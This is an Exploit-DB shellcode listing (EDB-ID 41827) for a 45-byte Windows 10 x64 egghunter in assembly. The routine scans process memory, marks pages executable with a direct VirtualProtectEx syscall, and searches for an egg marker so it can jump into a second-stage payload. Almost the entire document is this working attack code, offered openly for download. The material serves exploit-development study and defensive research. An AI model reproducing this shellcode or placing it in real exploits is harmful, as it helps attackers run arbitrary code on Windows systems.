Windows 10 x64 - Egghunter Shellcode (45 bytes)

EDB-ID: 41827
Author: Peter Baris
Published: 2017-04-06
CVE: N/A
Type: Shellcode
Platform: Win_x86-64
Shellcode: Download Shellcode Code Download / View Raw
Shellcode Size: 45 bytes

  
.code

Win10egghunterx64 PROC

_start:
push 7fh
pop rdi ; RDI is nonvolatile, so it will be preserved after syscalls

_setup:
inc rdi ; parameter 1 - lpAddress - counter
mov r9b,40h ; parameter 3 - flNewProtect - 0x40 PAGE_EXECUTE_READWRITE
pop rsi ; Stack alignment before the stack setup
pop rsi
push rdi
push rsp
pop rdx ; pointer to lpAddress
push 08h ; parameter 2 - dwSize 0x8
push rsp
pop r8 ; pointer to dwSize going to r8 - can be exchanged with mov r8,rsp
mov [rdx+20h],rsp ; parameter 4 - lpflOldprotect
dec r10 ; parameter 5 - hProcess - the handle will be -1, if not set you'll get a c0000008 error
_VirtualProtectEx:

push 50h ; 0x50h for Windows 10 and Windows Server 2016 x64, 0x4Dh for Windows 7 family
pop rax
syscall

_rc_check:

cmp al,01h ; check the response for non-allocated memory
jge _setup

_end: ; There won't be too many of these eggs in the memory

mov eax, 042303042h ; the egg
scasd
jnz _setup
jmp rdi

Win10egghunterx64 ENDP
END

Related Posts